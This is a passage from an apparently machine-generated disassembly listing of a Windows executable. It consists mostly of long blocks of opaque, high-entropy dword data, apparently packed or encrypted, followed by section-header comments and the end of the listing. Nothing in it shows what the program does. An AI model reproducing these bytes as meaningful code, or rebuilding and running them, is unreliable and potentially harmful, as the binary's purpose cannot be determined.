dd 0EBD79CCBh, 7FCD7FC6h, 97F8B9D0h, 0F0C9D0F7h, 0DBFB4367h
dd 0FD1770FCh, 8CDED47Eh, 0E1C7A030h, 57ED3065h, 0FE63BF97h
dd 0CCD26DBAh, 0DDC08C03h, 0BCBBEE43h, 4ED58E1Bh, 0DC36118Eh
dd 3FA3BFCFh, 6C16BB3Dh, 47E787DBh, 53F8FEC9h, 0DC4ADA4Bh
dd 389FDFFEh, 85D82C0Bh, 36EA03EBh, 5A5D490Bh, 3FBBE1BCh
dd 1FC10109h, 0B7F73871h, 207FD7B7h, 0E9D6F681h, 3643CB70h
dd 80B76EA8h, 50ECBC4Fh, 78C14DCAh, 5F176CD7h, 78D9D040h
dd 1A7F0B6Ah, 5DCF0CFAh, 2E1562ECh, 8EB4BBBFh, 0FF90BED4h
dd 0DC0CD862h, 0C80C66CBh, 0DDF67602h, 0FC037CB4h, 0EDD4CBEEh
dd 0F2ED6F6h, 336BDEEh, 9BEB2EDBh, 0D466F6F4h, 0C27BECCCh
dd 0DDF18F30h, 0A5B72DFAh, 7AE17FC8h, 0BA7C5BC5h, 2ED27AB6h
dd 3870CD2Bh, 1B282B03h, 0D2DDB27Eh, 6E5D00DAh, 7603B2CBh
dd 0DBAEB9F2h, 0DACCB6CBh, 0DB5F8C1Eh, 6E1F363Fh, 0B8F73FB0h
dd 0BFDBAC0Bh, 1B0BB66Dh, 0D09BEEFFh, 0CAD65EBCh, 0CB42F68h
dd 1ACBDBDFh, 0DAF8D680h, 86DCD49Eh, 0DBF87F4Fh, 0DE30DB6Dh
dd 0D2D4A003h, 0DAF72DCAh, 0D6DBCBDEh, 38CB037Dh, 22EECAE9h
dd 7BB70515h, 0B642BF42h, 61031B7Fh, 0DD713F6Eh, 0CC8F6E62h
dd 703BDBEBh, 3B78AE3Fh, 0D21E37FBh, 6D7F20BAh, 0F6B763F0h
dd 6FFBAE1Fh, 0D09C275Bh
dd 46EC8F6Eh, 0ADF63FDFh, 0F0DBB9D6h, 0F754039Bh, 0CBD8FCA6h
dd 3245B3Bh, 0FF89BABEh, 47BF3AB9h, 0C91F84B6h, 50BADB7Fh
dd 0B02DF13Fh, 3F2E1FB6h, 0AA10DDF6h, 0BECAD03h, 8DB7CE1Bh
dd 0DB7CAC23h, 0B8C3BBCDh, 0DB9B4C85h, 0B82311EAh, 46AE9B6Fh
dd 43CE869Ch, 6D1BFD6Bh, 10CB3F0Eh, 0DBEDB0F1h, 0ED23CA7Ch
dd 335F1C9h, 0DCF3B6B7h, 0B8236D36h, 72EABFBBh, 9CF4763Fh
dd 7FFDB403h, 9EBCD4FFh, 0DF03B0Bh, 0DA2EF83Fh, 0F69F16B2h
dd 91E92FDFh, 0E0ED2A1Ah, 0B5392CEBh, 0FFDF60FAh, 0CBD70CFBh
dd 0A8DC9B0Ah, 0F61F0B20h, 0DC2A7F7Eh, 4FE11DDBh, 0BFD6BC76h
dd 0DBE4B6E3h, 394AE76h, 8CDB85A5h, 1BDC7BC6h, 0BAC2DD0Fh
dd 47B69F9Ch, 0B98FDBECh, 0B6FE867Dh, 0BF1FAE63h, 0E0B78AA0h
dd 6E30DACBh, 0EDFBB65Fh, 0BDD9ACFFh, 8EACED13h, 0CAC7F9Fh
dd 0C9AB0BDAh, 1B794EDBh, 4E5481EBh, 1B1CDB77h, 5FAAB4E8h
dd 5E66BAFAh, 5926FF45h, 556FBD43h, 6BFDB14Fh, 96774851h
dd 5108BF44h, 5E4B71AFh, 5EFAAA06h, 0B798F764h, 0FC243DD0h
dd 2134E21Bh, 0AC6F2E3Bh, 0FF0AD62Eh, 16CA2A32h, 298B352Eh
dd 1FCD33FFh, 20343C25h, 0B407FD38h, 9C60071Ch, 0FF41774Bh
dd 680F1400h, 29F70917h, 681613FFh, 32EE160Eh, 0E212E00Ah
dd 0E6B25F3Eh, 0FF0AD83Ah, 0DBE7FDE7h, 1DE3F9DDh, 0ECF5CFFFh
dd 0F92B28D3h, 0F4ECC0E8h, 0F0E8FDBEh, 0F2B7D00Ch, 0E0FFDC00h
dd 0C5E3C6FBh, 0F8DFE53Bh, 0DB4EFDC1h, 0BF7E56CEh, 0ADC8D1FFh
dd 0CFD5C616h, 67FFD1FFh, 0FD23DDCBh, 8DDAFFC7h, 6798D9C2h
dd 0B8FFA4B6h, 6E805CA0h, 0FFB7ADBCh, 0B33ECFA9h, 0A37489B6h
dd 0B3A9B3F8h, 6FB79F4Dh, 7742D383h, 9DA745FFh, 99A37987h
dd 94E580FFh, 90AC708Ch, 0A874FF88h, 0A465948Ch, 91FF8552h
dd 0BD639D8Bh, 88679987h, 1CE723B9h, 610460C3h, 6AF140D4h
dd 0A4036800h, 0AA3EE868h, 2EE0074Bh, 0C05F6C64h, 95F94F43h
dd 87436FFFh, 47AAC4A3h, 799AFF8Fh, 1257534Eh, 45FD310Dh
dd 0DAEF6833h, 2CA646FFh, 8B467F24h, 4D3E9674h, 0FF8DDF45h
dd 0C1858DFFh, 0FFFFEEEAh, 64508E32h, 526A8A91h, 0B5538CBEh
dd 0B78A9903h, 72C3ED7Bh, 1BF6290Ch, 6226319Dh, 906AB028h
dd 0A3F7B011h, 0CEF0EF12h, 8310151Bh, 34755AA3h, 9BED5472h
dd 802AEA16h, 703912B0h, 9114D0FFh, 0DBE8479Fh, 95F2FE59h
dd 45A34901h, 50C02B3Ch, 4392405h, 505054F0h, 433C8514h
dd 0AA10904Ah, 0FCA8E8F8h, 9411B060h, 0A86817CEh, 5B6D03C4h
dd 0A8877Dh, 0A72A1B01h, 30AAA164h, 0FFD7B23h, 95016788h
dd 0C08B578Dh, 60520C40h, 80671B40h, 5F455C52h, 0F7206083h
dd 237E900h, 60A4001Eh, 71B091A0h, 0ECEBE082h, 27F8DB16h
dd 36CF355h, 79B0046Ch, 22249D9Bh, 93B4C93h, 1AF5F3h, 3C2E145Ch
dd 381E966Fh, 372EE0DCh, 0BD6A7249h, 0B3346308h, 0DE9E756h
dd 12EE56F8h, 84DE880Dh, 27532F28h, 4C890FE0h, 8F20CD29h
dd 8AA7A83h, 0DC7C9A0Bh, 5000000h, 0F041D724h, 1404528Bh
dd 8343D390h, 415062DBh, 82FE13C7h, 630189A3h, 0BCD8B60Ch
dd 0A83E08BAh, 0C3BBB6A9h, 0BABBFB0Ah, 0CB8AABDh, 8B89AD1Fh
dd 9C9EFF8Dh, 9ABB8D9Ah, 66D9689h, 0BA139FCFh, 0A7D4A9B8h
dd 6CC12BBh, 0B2E416C1h, 0B97B1B0h, 9AADFFFFh, 91909298h
dd 9E93BCFFh, 0B9FF8C8Ch, 9A93D996h, 8AAC3F0Ch, 0C9B2949Ch
dd 0BEFBD99Ah, 18B2B6AFh, 908B967Fh, 0FBBDDF8Dh, 90ADDF86h
dd 9E7D0A97h, 0ADABFF9Dh, 0B2FB0173h, 0B991969Eh, 0D926D17h
dd 9E9BB6F6h, 9BC50BA8h, 0FFFFE1BAh, 0A409E648h, 11A0E45Fh
dd 0F7D24612h, 0F64F50DDh, 38D04717h, 8393B447h, 2D16DD90h
dd 36AE906h, 2D20DC50h, 915668D4h, 270512D6h, 59197DA0h
dd 595506Fh, 24008200h, 0F61F8844h, 0A5804616h, 75C11B7Eh
dd 144B128Bh, 2C0A6A5Eh, 5012C17Ch, 3E800E45h, 68F0A506h
dd 44FFFFFCh, 0AE175591h, 11504904h, 1241002Bh, 6F1A1451h
dd 0FF7F80E8h, 9A75C100h, 18455712h, 856B7B6h, 460ACB32h
dd 9F9DD1A2h, 20E8599h, 120000C1h, 901200D0h, 6D925BA0h
dd 0FFFFFFE0h, 2D2A6889h, 2482C421h, 8CB48A6Ah, 2288A8C7h
dd 0EDA36E48h, 77F248E9h, 0C70FF0F0h, 6A8544C8h, 10C06803h
dd 0EDFAA330h, 0EE858D7Ch, 6C595514h, 0D08B7814h, 1DF4822h
dd 1012F6D5h, 93755FF8h, 0A96D4222h, 1B485085h, 6E06A2A9h
dd 20768920h, 0DE096AAEh, 0F1068C62h, 416F4904h, 22505078h
dd 0E0016548h, 897855FFh, 582E2256h, 80DFAC2Ah, 67C3611Fh
dd 8D40AA10h, 3705FFE4h, 8D367B58h, 0CDEDFC80h, 0FE05EDECh
dd 0DBD99BF9h, 0D9122005h, 0DCBB1817h, 7D11DE3Bh, 0BBB7B337h
dd 666F05BEh, 0DF5F776Fh, 0EFEEDECCh, 35123905h, 0D6F40DFFh
dd 898D3F62h, 0DDBDED99h, 33FD0595h, 52BBB7Bh, 517DF49h
dd 420A5C68h, 8E66056Dh, 6919880Ah, 820C1B91h, 139505BBh
dd 67E8260Ah, 7E227B61h, 0B75B80BBh, 3779A577h, 6BDB4A59h
dd 0B6BD4E05h, 0B2144405h, 93FB0C1Dh, 1121676Ah, 0DA57767Fh
dd 33B805DEh, 9C8CBBA9h, 0BBBD235Bh, 0AEB6F6D2h, 6DF73405h
dd 52162105h, 0BC68C0DFh, 0F65216B1h, 964042CBh, 0A11BBA1Ch
dd 0ED5005D6h, 6F0542DBh, 585B750h, 9C16E5D9h, 9CE0D628h
dd 0A8E7B4Dh, 91ED04B8h, 618F1780h, 0B55D7980h, 3DCE321Bh
dd 433D773Eh, 17BFAF05h, 0FFE1358Bh, 8D75E5E9h, 1A16DEB6h
dd 0EC058AECh, 0C07334h, 0FF1CF758h, 0F181721Dh, 0FE9B8D53h
dd 0AC50D0B6h, 7C184E05h, 66DB0327h, 35FE9018h, 0A8D59F10h
dd 0ED4F39D6h, 6E05C358h, 0DF86B14Fh, 62868505h, 6C05EF0Dh
dd 3DFE6F18h, 0BED7D96Ch, 10EBBF8Dh, 0D7F056Bh, 5D61AC5h
dd 1719B150h, 0E255F6h, 16BA11F3h, 1605D704h, 62050876h
dd 5E07E17h, 11DF9C0Dh, 0CC11AC35h, 586B056Fh, 9F98B623h
dd 2570FE19h, 5DD41B9h, 70FF19BAh, 19131B3Dh, 1B1C6B17h
dd 0F205B3ADh, 673046B0h, 60F6538Dh, 28C805CEh, 1F68830h
dd 9C330AD5h, 0BCE6DEC8h, 8F39169h, 19F8E40Ch, 345EDF78h
dd 6A8079DBh, 5EF5976h, 862E4EB8h, 17FF1A27h, 8F959E35h
dd 0BBC6A9B5h, 5C77A53h, 0F59CC17Fh, 8464058Eh, 0C69C121Ah
dd 0E400241Ah, 0D57D1ADEh, 0AE94CDAEh, 0EAB52C27h, 0D52CD605h
dd 0EB39FE05h, 0E405AB1Dh, 3BBF1DE0h, 5389533Dh, 0ACA16F11h
dd 581BAC77h, 0CA1BB2D9h, 0ED1BE476h, 11F4E93Eh, 0DE1CDFD9h
dd 6FB7BAB1h, 7563BD05h, 0F2056FECh, 0B9B46F22h, 9F0AFFB1h
dd 641C08C8h, 0A4BD8C4h, 7289FFDFh, 9A000A63h, 0F0469401h
dd 2FA22BF9h, 0CD631CE0h, 3EC7ED7Fh, 0D5F69335h, 54395BDh
dd 2B7BABFFh, 1D690587h, 351D177Fh, 31A9C2F7h, 0ADEEFBD5h
dd 7F059A1Ch, 34395BDDh, 17777305h, 0DB15FF06h, 6A0D098h
dd 9E0BD0B3h, 0F44EDF48h, 8F1E2B7Dh, 0A7068AF3h, 564D19B7h
dd 0D7CDDA0Eh, 0AF40EB05h, 5F405D05h, 1E4505EFh, 0B08CD7Ch
dd 871EB251h, 0DF155B6Ch, 1EB1B9A8h, 0D264CD4Ah, 800B67CAh
dd 228DD73Dh, 0E038F290h, 0A8DF55Dh, 0FE15F2A8h, 111F1E5Eh
dd 7F2EF0BCh, 0B6BEB11Fh, 0C50B6BE6h, 0C68605D6h, 9DD8B716h
dd 1A0DFD17h, 2F0305BCh, 142DAFB1h, 5F05FFB7h, 0FE28FB5Bh
dd 3A200105h, 0C945D0EFh, 2337200Ch, 0FB9E050Ah, 45BB320Dh
dd 0B6712774h, 0D8312850h, 2E472081h, 22C76460h, 0E276C34Bh
dd 0B7053C5Fh
dd 0D978BF5Bh, 0FB177105h, 248CEC4Dh, 49165D11h, 0A916056Bh
dd 17594A92h, 0D3377AFBh, 7F7D1134h, 0BF9924F1h, 49E2FF05h
dd 0B3BB0532h, 0EE810617h, 0EFCD50F8h, 370BBDB9h, 0CFFE1CB4h
dd 0CDA5A7B5h, 80B87122h, 803A2F22h, 64B693C5h, 8EC6CA29h
dd 0D599F9FCh, 7E210C2Fh, 690A780Ah, 0C241C44h, 190A443Bh
dd 676FE430h, 0DE829934h, 9D52D383h, 247DDF62h, 6F89E193h
dd 0C3264905h, 870513ECh, 0F17C4617h, 0BE65CB79h, 27864C59h
dd 7B05D6DEh, 0D8194FC2h, 48CF3AE4h, 4C0A63F9h, 0C922463Eh
dd 2281C971h, 330AA936h, 0CFC3C86Ch, 5423DA60h, 0C523243Eh
dd 2F0AF236h, 616CBE2Ch, 0ED24610Ah, 57237EF6h, 0A97A94Dh
dd 0C23122B4h, 0D30AFFB1h, 69113A2Dh, 1FDC2404h, 0D19FEB69h
dd 4DE2AB6Fh, 0BF950B60h, 0C09BC4F6h, 89F805E8h, 15D18137h
dd 0B21DC37Bh, 0CEB8A2BCh, 10AC6B76h, 0FD052DADh, 5BA3026Fh
dd 178F7C05h, 0AE687C3Dh, 9E35FF6h, 7ED06E8Ch, 0DD1813BFh
dd 24DCDB62h, 9AA0EF58h, 382504C9h, 2D47253Dh, 0DC2788Bh
dd 43B7277Bh, 56B81A6h, 34C7D43h, 228D5505h, 7C2DF6CCh
dd 0C8E4330Ah, 0B4F0CF9Eh, 743F8D22h, 0C8CCA0Ah, 0D32CF2F2h
dd 64260076h, 0AC3244Dh, 0DC2579D6h, 0B2AACD1h, 3093D8E7h
dd 4E36D49Eh, 393C79D0h, 0E742E4CCh, 777C98C4h, 0B6097E6h
dd 832EDF8Dh, 0B6DB269h, 40D3FD05h, 86051624h, 0D3406A8Eh
dd 26A3331Bh, 0BB4DE902h, 0BD680AC3h, 0ECF442F2h, 0B52C27AEh
dd 2CD60595h, 81FE052Ah, 5542C48h, 5028C6C5h, 0AE233FBh
dd 0DA12A01Dh, 462A4733h, 0AE91397h, 5F8B93C7h, 63E87890h
dd 949F250Bh, 84632CE7h, 120BED27h, 0C4E24ACEh, 296F6542h
dd 76CA8589h, 632D865Bh, 0A8C27017h, 80DD439Bh, 56B7F10h
dd 6BED6972h, 522DE777h, 93E728CFh, 0F1355F2Eh, 7D9C0B67h
dd 0B9CFB52h, 2F16F998h, 0EC23CC1Bh, 0F8E70B1Dh, 0A63035C6h
dd 61463037h, 1EB33076h, 3B9A743Fh, 85F76CE1h, 0B6FE0C37h
dd 0BE6FEED9h, 22C78B05h, 0D276C52Ah, 2424309Fh, 8B31329Dh
dd 0B5EC7F38h, 43646F0Ah, 0A3209DFh, 0A3157E68h, 0C5271132h
dd 0E3ADEADAh, 0E6FEF6B2h, 0F905593Bh, 0B277CDFDh, 0EF9BFB7Ch
dd 0CFB64A64h, 0DAAE8F1Dh, 0E811A27Fh, 1EBB0D10h, 1A89C9DFh
dd 93BEB8C2h, 34FA1635h, 467E6E11h, 0ACC63549h, 5CC4FDA0h
dd 8016FD35h, 5B69896h, 673B0AF4h, 5B5058Eh, 2CBB8B36h
dd 30366BF2h, 0BD58B0Ch, 0ECE5F03Bh, 0C8672293h, 13370FD2h
dd 0FB3CBA4Eh, 0C015E80Ah, 0F55DB20Fh, 46A60C3h, 40CED04h
dd 0F66046A2h, 97B54B05h, 6E15E8A2h, 0FB75DF6Fh, 0C0EEE881h
dd 0BB8F6D08h, 2F371593h, 0A08B4717h, 0FF36A516h, 8BE902C6h
dd 83C22BC7h, 8905E8F8h, 0A8160142h, 0F68DA846h, 3E083FFh
dd 0F302E9C1h, 0C88BF7A5h, 7F11A4F3h, 7C6D003h, 0DBD72BE9h
dd 5721EA83h, 0C78301E1h, 0C3757FCDh, 664D8D5Fh, 0F3CF2BF4h
dd 0EB342EAAh, 0C1F6DE02h, 0DEA00DC3h, 581CCA7Fh, 0FBB5882h
dd 10002417h, 3EF540A3h, 0A80B5A34h, 0CA139117h, 101568FFh
dd 1EBE000h, 57BF1126h, 0C6C14B24h, 8267284h, 0EA96F45Fh
dd 38F5BE0Fh, 58CA80F2h, 5BB3FFB5h, 0CB80FE33h, 3A5E6DD4h
dd 0F91BBF05h, 0BEF781F3h, 0D4FCB1EEh, 9FC6A00Ah, 0BBF343F8h
dd 0F2533440h, 83F34EFFh, 0F68547E3h, 0D2A46DF2h, 757C4FBDh
dd 0BF41BBAh, 0F0FF0312h, 68FF13F2h, 80DB0002h, 50AF120Eh
dd 0B5355C5Bh, 0BE558F6Dh, 0B836D385h, 0B81589B4h, 0DA13F683h
dd 648122FEh, 5AFE857Bh, 0BADBA43h, 0E8F40BC2h, 0DAA913DEh
dd 0DB4B5E83h, 0BD694643h, 0BE9802Dh, 4243B850h, 0B6BEB7F2h
dd 5F7DDD10h, 88884211h, 5FA21EC7h, 0F243F2EDh, 0FBE6EE92h
dd 48B84600h, 0C0052D18h, 0D6F758BBh, 82CD6D6Fh, 0C1615F6Fh
dd 0F319EDC1h, 0F2D2E523h, 61BAAD23h, 83AFF47h, 820C0E68h
dd 0FF55A56Eh, 0F25EA3A8h, 323C16Bh, 0C03BF7EBh, 85AE688Fh
dd 1E20755Dh, 8A2103DAh, 1552B8A2h, 0A822566Dh, 0B87DF0A8h
dd 6D16F207h, 0BD88DD1Dh, 46DD0105h, 444B58D7h, 0C033CC7Dh
dd 0AD8ED83Bh, 1E29E2C4h, 75FD9C7Fh, 0C5F183C5h, 5920C37Dh
dd 10F2276Ah, 132CDA46h, 88871F1h, 9E8208C0h, 1288C406h
dd 9090F03Ch, 0
dd 0FF4800h, 0B1h dup(0)
db 0
dword_440D31 dd 0 ; DATA XREF: sub_402636�r
align 400h
seg004 ends
; Section 6. (virtual address 00041000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00041000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 441000h
align 2000h
_idata2 ends
end start